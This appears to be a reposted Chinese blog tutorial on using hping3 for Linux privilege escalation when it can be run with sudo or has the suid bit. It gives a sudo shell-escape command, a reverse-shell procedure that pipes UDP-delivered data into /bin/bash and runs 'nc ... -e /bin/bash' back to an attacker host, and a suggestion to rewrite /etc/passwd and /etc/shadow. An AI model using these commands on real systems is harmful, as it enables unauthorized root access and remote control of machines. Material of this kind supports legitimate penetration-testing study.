當(dāng)hping3工具有個(gè)神奇的地方，hping3支持交互式運(yùn)行，終端中輸入hping3后可以進(jìn)入一個(gè)hping3的控制臺(tái)，這個(gè)控制臺(tái)不但可以執(zhí)行hping3自己的命令，也可以把非自身命令定向到shell終端去，當(dāng)作系統(tǒng)命令執(zhí)行，因此當(dāng)hping3具有suid位或者用戶有權(quán)限通過(guò)sudo執(zhí)行hping3的時(shí)候，hping3可以用來(lái)被提權(quán)。

1、sudo情況

1）如圖，當(dāng)前用戶可以sudo免密執(zhí)行hping3

2）執(zhí)行如下代碼即可提權(quán)成為root賬戶，如圖

~:sudo hping3
hping3>/bin/bash

########################## 反彈SHELL ##########################

//順便記錄下hping3通過(guò)傳輸文件進(jìn)行反彈shell的做法（網(wǎng)上很多文章提到這個(gè)環(huán)節(jié)的步驟，幾乎都不能復(fù)現(xiàn)，原因在于使用了--safe參數(shù)。這個(gè)參數(shù)是保證文件傳輸過(guò)程中，如果數(shù)據(jù)包丟失可以重傳。本來(lái)應(yīng)該是一個(gè)人畜無(wú)害的參數(shù)，但是確實(shí)無(wú)法運(yùn)行，原因沒(méi)有細(xì)究）

1）攻擊機(jī)監(jiān)聽用nc監(jiān)聽一個(gè)端口

nc -lvnp 9999

2) 被攻擊機(jī)器通過(guò)hping3監(jiān)聽流量，并重定向到/bin/bash中

hping3 192.168.146.128 --listen signature --udp -p 5656 -I enp0s3 |/bin/bash

3）攻擊機(jī)編寫反彈shell的bash命令

echo "nc 192.168.146.128 8888 -e /bin/bash" > shell

4）通過(guò)hping3將shell命令傳送到被攻擊機(jī)

hping3 192.168.146.136 --udp -p 5656 -d 100 --sign signature --file ./shell

5）現(xiàn)在看之前監(jiān)聽的9999端口應(yīng)該已經(jīng)接收到shell了

*PS這個(gè)過(guò)程個(gè)人感覺(jué)有點(diǎn)雞肋，不能用來(lái)提權(quán)。因?yàn)閘inux下，sudo命令不會(huì)被繼承到管道符和重定向符之后。也就是說(shuō)，即使用sudo hping3 ...|/bin/bash。執(zhí)行后得到的shell也不是root權(quán)限。既然如此，反彈shell有一萬(wàn)種方式，為什么要用這么一個(gè)不穩(wěn)定的方式。

2、有suid位情況

1）如圖，hping3具備suid位

2）直接進(jìn)入hping3控制臺(tái)，便具備了root資源的訪問(wèn)權(quán)限

此時(shí)可以通過(guò)改寫/etc/passwd和/etc/shadow文件，修改root密碼，進(jìn)而獲取root權(quán)限

總結(jié)

以上是生活随笔為你收集整理的sudo -hping3提权（含 suid位）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。